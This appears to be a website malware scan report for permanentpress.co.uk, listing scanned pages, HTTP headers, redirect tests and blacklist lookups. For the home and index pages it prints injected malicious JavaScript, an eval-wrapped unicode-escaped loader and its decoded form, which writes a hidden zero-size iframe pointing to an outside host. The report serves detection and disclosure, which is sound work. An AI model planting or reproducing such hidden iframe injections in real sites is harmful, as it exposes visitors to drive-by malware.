Scanned pages/files
Request | Server response | Status |
http://permanentpress.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 27 Feb 2015 09:15:08 GMT Location: http://www.permanentpress.co.uk/ Server: Apache Vary: Accept-Encoding Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.permanentpress.co.uk/ | 200 OK Content-Length: 4953 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var ShowText = eval; ShowText('\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077\u0072\u0069\u0074\u0065\u0028\u0027\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0063\u0068\u0061\u0074\u0073\u0069\u0064\u0065\u002e\u006e\u0065\u0074\u002f\u0067\u006f\u002e\u0070\u0068\u0070\u003f\u0073\u0069\u0064\u003d\u0031\u0022\u0020\u0066\u0072\u0061\u006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0022\u0030\u0 Decoded script: document.write('<iframe src="http://chatside.net/go.php?sid=1" frameborder="0" border="0" width="0" height="0" style="position: absolute; visibility: hidden"></iframe>'); document.write('<iframe src="http://chatside.net/go.php?sid=1" frameborder="0" border="0" width="0" height="0" style="position: absolute; visibility: hidden"></iframe>'); <iframe src="http://chatside.net/go.php?sid=1" frameborder="0" border="0" width="0" height="0" style="position: absolute; visibility: hidden"></iframe> Antivirus reports:
| ||
http://www.permanentpress.co.uk/GeneratedItems/CSScriptLib.js | 200 OK Content-Length: 74417 Content-Type: application/javascript | clean |
http://permanentpress.org/index.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 27 Feb 2015 09:15:10 GMT Location: http://www.permanentpress.co.uk/index.html Server: Apache Vary: Accept-Encoding Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.permanentpress.co.uk/index.html | 200 OK Content-Length: 4953 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var ShowText = eval; ShowText('\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077\u0072\u0069\u0074\u0065\u0028\u0027\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0063\u0068\u0061\u0074\u0073\u0069\u0064\u0065\u002e\u006e\u0065\u0074\u002f\u0067\u006f\u002e\u0070\u0068\u0070\u003f\u0073\u0069\u0064\u003d\u0031\u0022\u0020\u0066\u0072\u0061\u006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0022\u0030\u0 Decoded script: document.write('<iframe src="http://chatside.net/go.php?sid=1" frameborder="0" border="0" width="0" height="0" style="position: absolute; visibility: hidden"></iframe>'); document.write('<iframe src="http://chatside.net/go.php?sid=1" frameborder="0" border="0" width="0" height="0" style="position: absolute; visibility: hidden"></iframe>'); <iframe src="http://chatside.net/go.php?sid=1" frameborder="0" border="0" width="0" height="0" style="position: absolute; visibility: hidden"></iframe> Antivirus reports:
| ||
http://www.permanentpress.co.uk/about.html | 200 OK Content-Length: 7480 Content-Type: text/html | clean |
http://www.permanentpress.co.uk/publications.html | 200 OK Content-Length: 109128 Content-Type: text/html | clean |
http://www.permanentpress.co.uk/file:///C:/Documents%20and%20Settings/user/Application%20Data/Adobe/Adobe%20GoLive/Settings/JScripts/GlobalScripts/CSScriptLib.js | 404 Not Found Content-Length: 438 Content-Type: text/html | clean |
http://www.permanentpress.co.uk/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.permanentpress.co.uk/contact.html | 200 OK Content-Length: 6293 Content-Type: text/html | clean |
http://www.permanentpress.co.uk/links.html | 200 OK Content-Length: 6251 Content-Type: text/html | clean |
http://permanentpress.org/publications.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 27 Feb 2015 09:15:14 GMT Location: http://www.permanentpress.co.uk/publications.html Server: Apache Vary: Accept-Encoding Content-Length: 257 Content-Type: text/html; charset=iso-8859-1 | clean |
http://permanentpress.org/contact.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 27 Feb 2015 09:15:15 GMT Location: http://www.permanentpress.co.uk/contact.html Server: Apache Vary: Accept-Encoding Content-Length: 252 Content-Type: text/html; charset=iso-8859-1 | clean |
http://permanentpress.org/links.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 27 Feb 2015 09:15:15 GMT Location: http://www.permanentpress.co.uk/links.html Server: Apache Vary: Accept-Encoding Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 | clean |
http://permanentpress.org/about.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 27 Feb 2015 09:15:15 GMT Location: http://www.permanentpress.co.uk/about.html Server: Apache Vary: Accept-Encoding Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: permanentpress.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 27 Feb 2015 09:15:08 GMT
Location: http://www.permanentpress.co.uk/
Server: Apache
Vary: Accept-Encoding
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
...240 bytes of data.
GET / HTTP/1.1
Host: permanentpress.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 27 Feb 2015 09:15:08 GMT
Location: http://www.permanentpress.co.uk/
Server: Apache
Vary: Accept-Encoding
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
...240 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: permanentpress.org
Referer: http://www.google.com/search?q=permanentpress.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: permanentpress.org
Referer: http://www.google.com/search?q=permanentpress.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=permanentpress.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://permanentpress.org/
Result: permanentpress.org is not infected or malware details are not published yet.
Result: permanentpress.org is not infected or malware details are not published yet.